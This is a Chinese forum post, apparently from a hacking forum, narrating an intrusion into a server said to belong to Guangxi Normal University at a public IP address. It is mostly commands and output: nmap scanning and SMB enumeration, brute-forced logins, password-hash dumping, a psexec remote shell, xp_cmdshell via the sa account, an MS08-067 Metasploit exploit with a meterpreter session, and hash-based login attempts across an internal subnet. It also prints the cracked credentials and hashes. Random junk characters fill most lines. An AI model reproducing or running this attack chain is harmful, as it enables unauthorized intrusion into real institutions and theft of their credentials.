中国网络渗透测试联盟

标题: nmap+msf入侵广西师范 [打印本页]
作者: admin    时间: 2012-12-4 12:46
标题: nmap+msf入侵广西师范
广西师范网站http://202.103.242.241/# O0 Z7 I6 R3 X" r
5 t8 h$ Z9 V( s0 z2 e1 H8 h
root@bt:~# nmap -sS -sV 202.103.242.241
% p, B# O; E- U- A6 g& c) W
/ _) ^: ~+ m0 H- `( a5 o& zStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
" _4 J* x$ Q3 X4 L' K, K- V* E6 W' ~7 ^  {- i, N4 V7 o
Nmap scan report for bogon (202.103.242.241)
( {* s5 @1 Z, _. \& B* ]3 a; _4 ~6 v
Host is up (0.00048s latency).6 Y: F" A0 e4 \$ ^) F

. J3 h' q% W$ k2 q8 qNot shown: 993 closed ports
, w& y9 [/ o* F( [: y* H0 r! Q% @" z5 {( y- D* J/ a, d
PORT     STATE SERVICE       VERSION0 C5 O, g* O- ]2 t% y6 V

: m# e. a2 [+ p* ^: `6 g135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)  x# {+ j' A- N" X6 Q+ J& V
6 f* g; Z; b7 H4 L; d# x$ Q
139/tcp  open  netbios-ssn
9 `) T/ @* K  P+ L2 H5 L( p
0 l; I8 {8 F* y; f+ u8 c  ^: n3 f445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds8 D- ?: u2 H/ R

/ {: p/ w/ s; k2 Y" K! O1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
' k# ~4 w/ ~* C% {6 m. S8 Y; s9 ~% Q' e
1026/tcp open  msrpc         Microsoft Windows RPC
9 ]4 e; r. H) v% a( a& d; {" g4 x. n$ A3 n
3372/tcp open  msdtc?
+ X# M9 a& z& X" u+ V7 }' T' D+ J$ P5 f
3389/tcp open  ms-term-serv?
5 R! O8 R" B+ D& @7 |" e5 v7 e. d: Z! }9 O% W
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :+ e; O. x  u& k- e
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r9 b& b( ^4 ]& k+ F

% k  z4 S/ V% lSFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions6 n8 T+ ~! C( [' H( I
: N8 B% i: k( j9 S5 m
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)) V7 d9 @( e! E$ {

% I0 s* L, ?+ t! u  `; q1 @7 mSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO/ l1 x' h  ~4 I, u, ]8 p% k. ~: v

$ y* \" w" [: TSF:ptions,6,”hO\n\x000Z”);/ F# j9 d8 P1 g- a3 F
0 E3 r9 ^' `2 B+ |  l
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# u3 `6 C$ I. @0 U+ J
" @: W/ r/ ~( r6 K" K
Service Info: OS: Windows2 E% U# y2 j% ?+ w
! z" G- {7 n7 z" J$ S4 ]
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .$ b; v- r; d: v6 ^9 U' }
/ X7 \5 w# X* R) k" P9 \
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
( \9 l) Y' x$ G8 J+ x2 U' K
# d3 K! i* d/ s: b# G" G8 a4 vroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本1 W! n! M$ e- J% x" a$ l4 `
! W4 W7 J* @9 Q7 H# f  J+ D- l
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
# L$ |0 R7 R, J4 i) f0 i9 d  |2 ~$ \0 _, }( e$ h
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse; }8 y" ~0 I) i$ V7 C+ \* Y. h/ z

7 ]9 }! e1 l, |. o5 A0 z7 f. m# k-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse1 g5 L# s+ x( s

2 E5 T% x  W. O! c6 n2 H; d, a1 B$ W-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
4 b, K; f* R- ?9 l) F; i
# T2 n1 Z  q7 K1 l2 ]+ a-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse$ R2 I5 F6 S4 l- r" h8 T

, ]+ ?) y+ |- X. @% l# d-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
, L  o8 _! M/ y3 X6 F& b; U  d- O9 R5 V1 I0 \# e5 z" K: W
-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse* `1 t. z* H  N9 o5 ~

# v3 `5 t/ A5 {- Z7 H5 D* ~  l-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
5 J8 Z, q% p: l7 F: _
; v% |4 g% q5 X5 Z-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse
! U0 w8 c, Y8 G4 n9 D
0 t" ]. B& N0 [, A$ S-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
* ]8 i+ y2 N; G& o& j6 r, N! k" ~5 \  `5 I) u+ @! U
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse; s0 ]* R2 V: m; u; `9 y

0 X0 a/ Z7 _# w* v& ?% \( |% x1 a-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
: J( Q, ^9 V7 m' W2 e7 O. o- }* H; M) u
-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
' @( P, M9 j# b
; I0 z7 T/ ]1 F, M+ X2 B+ d-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse) `" N+ a& Z+ b7 C
. _3 A+ |$ d: d4 T( ]* W4 D
-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse- {4 `# H0 l2 o. j4 O) ?0 u

$ F$ b0 J2 L2 q, f% t# E/ q' Rroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   
" u, ]; n' [! {7 A4 Y, g
3 ]3 l, _2 N' y* Y4 P6 k: _//此乃使用脚本扫描远程机器所存在的账户名
$ d: N3 ]5 [  x$ t4 M9 b* t' l+ d
( |8 i$ Z/ w/ \8 _2 v# OStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
0 c( n3 W" \- L) v1 g7 q9 }) I( x2 v" O
Nmap scan report for bogon (202.103.242.241)" {! J( c% p) k0 q- s
9 P* W  B+ t5 U  c% p
Host is up (0.00038s latency).
2 g. L6 b0 K, R  r! C' y/ a5 @3 V; C' P
Not shown: 993 closed ports( [+ x! u! m  r+ s

! D$ _4 C' V0 b* T+ C( d/ V; H. TPORT     STATE SERVICE! X* o% N( E! i' B; }

* I! }# k- i' \3 S# @: h% @  I135/tcp  open  msrpc" y# ^* S3 ~: o. H5 N, A
/ `' A* K' n7 `+ z6 O- |$ I
139/tcp  open  netbios-ssn
, J, n$ {0 _- V- Y9 p0 D$ O; k& f0 f, }1 D6 @! z
445/tcp  open  microsoft-ds
1 C3 r6 c6 f; \1 u! d. l( H5 |1 s: p! M, O- _
1025/tcp open  NFS-or-IIS
* _# G. j4 m- T/ `" t
2 `) S: G4 J. H8 S, P( E7 d1026/tcp open  LSA-or-nterm
2 R( k2 G  Z) @9 l2 w
; y$ A& E# v( |" s7 u2 Q4 G3372/tcp open  msdtc
7 h8 d7 d/ \2 @2 a* E+ e6 Q0 `( |$ ~/ K
3389/tcp open  ms-term-serv3 G2 R( m. r% C* Y. N$ n8 Q
* M# y- Y9 e6 ^* M: E: @1 p
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
, n* [0 @2 ~% r4 v
- }6 [" r, {4 @6 BHost script results:
2 d" F% u# C8 o+ L% A" O$ {7 K7 B0 N
| smb-enum-users:' `# j8 O" a, E& _, I

& ]3 F/ T% G5 Q/ C, c8 r6 T- Z|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
' v, ^% Q: ~7 m6 Z4 u- m* l" H1 l/ `9 |- d5 P) L1 z
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
& p+ b$ H3 c3 h* X6 b# A
& S4 b) z+ m7 u& D0 y. groot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 + x) f5 {2 |3 g7 P" u! P( g/ E
+ J6 d1 t2 M  [0 Z' r  @
//查看共享% u+ ^5 c* B  t" E. X1 f; r
$ A. k1 A1 B  s! A9 \. g1 S& _0 U
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
9 R. y2 f* \! S! h5 F6 I9 U+ N& O" a7 {) W- P% ^
Nmap scan report for bogon (202.103.242.241)% C7 i" v5 Y0 m* F% D

. f4 s# T- n4 v& eHost is up (0.00035s latency).+ s* p% Y, O) [. w. Q6 r: H! T
5 i- D; |: _% _, I
Not shown: 993 closed ports
9 A% z. e) [* o- x( w/ _: W! @* A+ i6 O
PORT     STATE SERVICE
, t! ?4 E: l9 Y/ Y) @( j1 W- F( x1 U3 u4 ?& N- I; p* J
135/tcp  open  msrpc2 Q" u( I- X5 X: x8 k
  D! I$ C) ]7 U3 w0 d+ j6 y
139/tcp  open  netbios-ssn
5 e& O4 W! |8 m, ^7 F8 ]0 x) {8 k  B; V# l/ G3 w
445/tcp  open  microsoft-ds& y2 u) G( w( f" d% E. D
& y; L" J, I: H1 z- _  ^
1025/tcp open  NFS-or-IIS
! }0 `3 _- G8 u7 L( ~( ]- M
& o5 g7 @8 X# [! V1026/tcp open  LSA-or-nterm
  c* O4 K" B8 _0 ?0 |3 v+ _1 _  p" U6 I5 n$ K' ^" D8 {
3372/tcp open  msdtc- Z3 |* w8 J- T2 [( S
' r9 V, `+ \9 Z4 C7 |! i* W
3389/tcp open  ms-term-serv
. L) `. G: Y9 Z
: t) d4 F8 K( E0 ~6 n8 n/ _MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)! m) w2 V; O/ o, c' `
7 k% d. E; m5 M6 Q8 H
Host script results:
6 ?7 T8 W; H" l# y
6 P9 V+ j+ f1 f" G9 M| smb-enum-shares:' V4 ]; Y: r" c! L" `* b

- x- y: y$ ~! z2 b|   ADMIN$
3 N: f+ w* n- ?  r+ n% G3 F" _$ T( @9 H) D, ?2 M
|     Anonymous access: <none>2 A# |" B. l) ]( \, y5 }

! z9 e0 h0 |$ z8 V/ g|   C$4 L$ G/ _  q# }2 b! N

7 G9 ^+ A. \. M: a  D2 s0 M, q|     Anonymous access: <none>
% r6 s) W) \8 l3 N/ n" E1 A, p2 ~) s$ P2 X
|   IPC$
8 l' N$ s/ T9 y, n9 R$ V- R1 o- l0 Q
|_    Anonymous access: READ
! z5 d7 {' {1 K, V1 {4 B' g& v) t
, X. V5 y% N; i% U) P6 U( K) @- S& }, UNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
6 d& J$ u- n# L# C$ a8 e  I' B. q- y. v  N
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241       6 i5 ~* ^3 A; v/ @5 x2 r' C
" T! _5 S2 E* Q: p2 k! P
//获取用户密码
% i- }% c+ R+ f! _
3 [& q# O* x7 O( L4 g  K7 lStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST/ ?! Q% N; \8 V  n5 F' h( n
9 ~( m% `8 a: v. p
Nmap scan report for bogon (202.103.242.2418)
; l# l- C1 r) }2 s- S
" y, o* V2 u* \$ y  `+ DHost is up (0.00041s latency).
& c/ Q1 q7 T4 o1 n5 [1 u  J8 u* N  L( m0 `( U) D
Not shown: 993 closed ports- ]8 J8 o1 Z' D( }6 z
* e0 z& ?5 A0 u" l
PORT     STATE SERVICE) D# `& {) R$ C9 d+ N1 v
4 p) n+ l; X  R: ?
135/tcp  open  msrpc
$ [3 l5 R! P1 g5 I5 J- T( q& q% V. j: A  R: Y
139/tcp  open  netbios-ssn- G0 P$ V  L8 w3 D  m0 w% G; b; s3 w  ^

/ M3 [% Z3 S8 F2 P) i445/tcp  open  microsoft-ds0 e& l1 ?" P1 p+ W) Q0 |
! B& G0 B: M' x5 y
1025/tcp open  NFS-or-IIS
) Y  e' H. Z2 J) x. r6 u
* }$ o# i3 |2 Q  s  y1026/tcp open  LSA-or-nterm
0 h0 Z: u% Q7 ^. X, ^1 g
8 L" ^$ M- V; V+ S1 I3372/tcp open  msdtc0 t5 I, R+ H# u( H" g% C6 M5 ~4 o
0 _$ u* {4 w  G" e# q' G; E
3389/tcp open  ms-term-serv, G# C: J2 ]- A
( I7 |- }. x7 U5 B  Z
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
7 ^/ }$ J. t* z. p* u2 R  L8 ?2 j6 h- H* |
Host script results:8 n, x( q. z# o- H

$ g/ z% b. t: e+ i7 Y- || smb-brute:) A8 f' ~+ y( ^0 K
# a+ D; Y% i; R. a: d. Z9 l
administrator:<blank> => Login was successful
, i/ c, w- _4 P0 @, f5 @6 @" ]/ F' A. D
|_  test:123456 => Login was successful
1 U- C+ T3 @% o: n, L3 Q; Z) J% q% V: U$ O9 T- f! u* O! G
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
( h! ~/ O8 y5 b- H
. l" P  B& S! q) U  xroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
9 V7 a* G1 ^/ i! o; ^
# a1 k; g- ~5 droot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
+ j" E, b4 Q  K" `0 z( ?0 }
% h) W1 E4 l6 H1 D9 @8 B3 |root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse1 m- ?9 N: j# y( B
0 ^& t0 [' q/ E% `: J% W9 m
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
/ X. w+ c9 r$ |: M! A
, Q8 z9 T5 A& K) \0 e7 V5 C  nStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST3 |9 h4 Y) a/ q  h& ^' t
, K8 L2 k6 ~  V5 L& U' X: j: j
Nmap scan report for bogon (202.103.242.241)3 u- x* D! O5 D/ F- t. t3 |  a" x, z7 u2 m

. o" e' a9 Y) F" B& \7 }Host is up (0.0012s latency).) B* T/ k; Z# R# J5 |4 x) Q
; {2 P2 H5 \& N  ]$ x2 N
PORT    STATE SERVICE
! t4 u# C& I% I/ H/ y
/ J: K7 P3 R3 G" b135/tcp open  msrpc2 z5 y' ^6 Z! p; Y' Y+ p
" O9 i/ C- T. J) K* e4 ?) L* t
139/tcp open  netbios-ssn
0 s; @) q; b5 i; H
7 L) I$ G. f: {5 y. T445/tcp open  microsoft-ds0 n/ n9 d; D* w+ R  @  L
; }2 P3 J3 F% Q8 v
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)) [& d' ]; o0 a: h
- E) M$ a9 q; g! b& Z4 A, |' [
Host script results:- l: G; d( Y. B; }& {
1 v" ?* N/ ~# r' b5 `4 G7 O" s
| smb-pwdump:
# B  W/ x) \  O  W1 j; I+ x: {6 }" v) K* D3 B, S" ^; D
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD********************** Q& V2 v+ W2 M0 S0 P

9 b8 z8 _# |0 a9 p  z| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
* H( t: g+ m1 Y) a8 P6 h; h/ i4 p) W, M- U2 x. l8 E' G
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D45 T4 w6 v# N3 n! z0 O
7 S6 k! i! A" }: I/ D$ n+ ?
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
% X% x/ I7 K5 x! W: ]6 M5 i: R5 [) j$ o. i# Q8 A
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
1 A* {: _8 J6 K- K# M1 z) T: x/ p  j5 i) Q
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell4 k4 Y: u1 P! u0 f
  @7 F7 [( q* Q' C% N1 P( Q
-p 123456 -e cmd.exe
; O, A6 X  C! r# d. t
' V3 ^. \; H) a3 a% I3 a! S: \PsExec v1.55 – Execute processes remotely9 \9 X! I8 f6 H( O) a3 |

1 C0 l) V& ?9 [; S9 e3 m6 mCopyright (C) 2001-2004 Mark Russinovich
3 N: n$ Z9 d1 E
; l$ j; z' {+ nSysinternals – www.sysinternals.com5 Y/ r1 I" L1 v6 F4 V4 d) n6 ?
" n9 _6 c2 ]0 @
Microsoft Windows 2000 [Version 5.00.2195], J, z$ N6 @/ I2 B) i5 t/ H9 y

5 g2 i% W8 `: ~9 J* W" h. X: Q0 Y(C) 版权所有 1985-2000 Microsoft Corp.# o* m8 Z- {9 F0 f, Z8 P" V
2 m$ `5 {( S. ~8 a, B
C:\WINNT\system32>ipconfig( A1 H5 \& n! C* D6 x7 I8 o
* i5 Z. o2 ?+ C$ U7 m: T
Windows 2000 IP Configuration/ X& q0 U: n" W+ g6 w

9 ^: M! N# m! WEthernet adapter 本地连接:+ i) v1 @' D1 y# X( s% T) _* @
' `% [) f$ U1 V( \
Connection-specific DNS Suffix  . :
/ a; `3 R8 d, J" ~- U: G6 t0 Z& m6 V
IP Address. . . . . . . . . . . . : 202.103.242.241
2 g& m6 E: e$ [: s( m( d2 Q4 W) A- K* k8 V' a+ W% z4 a  z
Subnet Mask . . . . . . . . . . . : 255.255.255.0
" O  a: M( S0 V4 }2 R5 H0 Y9 [' E0 f
Default Gateway . . . . . . . . . : 202.103.1.1; p9 w4 V! l' n% j1 l0 Z) ]* U' |
2 F4 `, V9 L$ Z& w; a" s4 o8 ~8 h3 \
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令. K' q* j8 |1 l. t9 K$ o
5 B( ~# W) z- ?+ l+ Y+ \
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞
8 c* h7 `$ f4 G8 H3 o  L; ^0 x$ |/ D
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
8 V  K' z6 t: f$ Z- S% f% N  h) s: Z+ m+ e, q% d+ b
Nmap scan report for bogon (202.103.242.241)
6 y% ~9 E9 o1 L5 K0 B$ W& B: Z/ I0 n
/ `; s& v  Q3 X9 D' rHost is up (0.00046s latency)./ a3 a% ?1 N. E$ M$ `8 v. }1 _
; ^( l5 Z8 Y$ q7 @& B3 V
Not shown: 993 closed ports
  L( H- {( d) W& q! K
7 F0 g' t3 j7 U( E5 o) ?PORT     STATE SERVICE% E" o& R, _5 _6 V( o+ `, k
8 e! X& d  D" _$ I# A; p/ ~
135/tcp  open  msrpc
/ U' F& P& q" F) z6 y* Q+ H) O" l; O7 t* l
139/tcp  open  netbios-ssn
$ l- n* |: J9 x% m- u+ C8 g+ k) @) H& B% s9 c5 b
445/tcp  open  microsoft-ds
3 j# g/ c! \' X% ]  C+ d4 i" F( c% b* |0 K& f- Q. }& i7 K) y& A- d
1025/tcp open  NFS-or-IIS
+ L' Y! d! Y) C, [/ W
$ g5 l+ |5 k* @: _3 p1026/tcp open  LSA-or-nterm
% h9 H! }; N1 Y+ s/ S; x- T# d- G. b3 ?) R& y" ^- ^/ x" ^
3372/tcp open  msdtc
" n- w5 E- y1 Y1 h
% m& a- F' a' ^  |# g) E) V3389/tcp open  ms-term-serv8 a& I8 p: y& U, C) m- e$ c
# D/ i8 Q7 T1 a) K# P/ S1 z
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)* C8 R5 y  P# D8 |+ t3 m; T
  w$ p/ g  w& C5 T0 I; M  U2 \5 ]6 j* n3 [
Host script results:3 |' S& k6 Q" q$ D

; P* C7 O, W' }; w( a  A# {| smb-check-vulns:
7 ?4 `9 ?5 ^" X7 M3 J  G3 I! t( {- O# j% v3 n
|_  MS08-067: VULNERABLE
* I+ L; ?4 K8 l" U' G' w
# X3 }7 H) i: i/ B, H9 ~+ RNmap done: 1 IP address (1 host up) scanned in 1.43 seconds* y- _# c; H- l# v: s9 w

6 D3 \" A3 I# H) ^6 d% x$ b# G9 M/ nroot@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出! z5 J% R$ M$ l
( m+ u% x0 c- E  t; X
msf > search ms08! N- f/ T( M# D5 E* c8 C& e2 r
  m- z/ G6 I* e  Q  b3 d1 i
msf > use exploit/windows/smb/ms08_067_netapi
7 j3 }6 L4 o' I1 z$ D5 x/ ^6 l4 y1 j
* j. Z* t+ K8 E' e7 mmsf  exploit(ms08_067_netapi) > show options# U# H2 w9 F% j. P

- e# l+ q) f4 Z- k, L5 x* ?msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.2414 Z& K- G7 A# e' a( P8 b
& T3 Z, `6 y3 M
msf  exploit(ms08_067_netapi) > show payloads9 c. \) m, T5 c( g/ Y
8 y% A. O& R3 L* K/ n2 q, Y) T4 w
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp" `6 ~3 O+ e" h+ |+ L; \
& h3 B4 X8 U. _
msf  exploit(ms08_067_netapi) > exploit
- X/ G! y! C1 b5 f* @
, H$ [/ I1 i2 h! umeterpreter >4 N8 c. c1 x1 z- }5 h) r8 ]

, J4 k* S+ L2 f9 o) K/ `Background session 2? [y/N]  (ctrl+z); p  B) B% s8 F
% g+ e$ E+ u3 Z0 h" s9 d
msf  exploit(ms08_067_netapi) > sessions -l
2 K! y; W# g& R4 E* j5 c- N* ?7 b9 Y* r' w" {
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt% `; a* v, }, \% z. t& J7 L- d
8 x) K( j2 x; _& {
test" w7 x8 }. N9 ~% F

" h8 J8 Z3 R+ C) g3 cadministrator
; x5 n' M" ]$ g0 Z8 U
- `3 n0 }' T5 z8 l0 Nroot@bt:/usr/local/share/nmap/scripts# vim password.txt
2 ]3 W% U8 e! i' ^2 P/ }! J) f! A# Z/ l  O
44EFCE164AB921CAAAD3B435B51404EE+ N; }; r" C2 {& k6 G9 E

' @7 _+ \6 {3 X- B: droot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
5 y; X1 w, ^0 c, X8 r6 O6 L
9 i$ x! @( I0 G; K- z5 G) b- I //利用用户名跟获取的hash尝试对整段内网进行登录
8 y+ n3 k2 R5 F! X( ^
( t$ r( E; P4 |% S. [$ d  I8 [0 kNmap scan report for 192.168.1.1055 j# d* p5 J  t6 |( x, i* x- K

8 d9 G/ s/ d* J. T% \) u' z: Z: vHost is up (0.00088s latency).
4 X; u+ M/ P% h
# `2 g3 s- M+ v  Z, MNot shown: 993 closed ports. l- z) H! i3 u& w

! ?5 C( d3 U: L, b7 d: M/ pPORT     STATE SERVICE' |/ y3 i% _! X& n0 U. }

/ ~: p7 H  B5 g- k135/tcp  open  msrpc
7 I9 c$ \7 I$ q4 o9 k
5 b* }2 x+ Y/ H) h, \5 V/ G139/tcp  open  netbios-ssn
6 R3 ?* D7 C$ w* B! g! Q4 a: S; S6 L9 W3 W4 j; @! m
445/tcp  open  microsoft-ds
, ?* e% P1 b2 i6 u: v: I0 c) R
$ s5 ~% {4 k5 G' A0 y1025/tcp open  NFS-or-IIS
; Y+ H3 j3 B. A+ [* w$ v0 |2 E
* V* k) K) x  e- u1026/tcp open  LSA-or-nterm& n7 l; ?( X/ ?& _/ H8 E7 a# [

: b3 w% l4 _" v7 a5 r( N3372/tcp open  msdtc; m7 J, W: ?) I* M; P' ^

0 A, ^" O- q2 r3 H% C' J3389/tcp open  ms-term-serv6 a- K( w! p5 N' a6 S: G% p+ k
+ F/ B8 }+ P1 P! P
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
0 N9 Y- e- s" S' m, E3 }
$ G/ s( j1 ]4 ]: @# {/ c! v) B% QHost script results:* {9 o) y+ _. W& b; S8 S, k
* S, J* ]3 I( K& J4 a- K3 u- g1 E
| smb-brute:4 i% O8 f8 Z: E, W" D& \/ h6 [5 r
4 L$ Z0 b" s2 ]7 @, y# S" P
|_  administrator:<blank> => Login was successful" c1 s4 @. I' ?) N

5 L$ y5 O4 @( D' p6 x9 {1 |$ ?攻击成功,一个简单的msf+nmap攻击~~·
6 v% [) _' M% t# e: X2 ?# N% c( P; H5 c, q3 T7 \# G




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2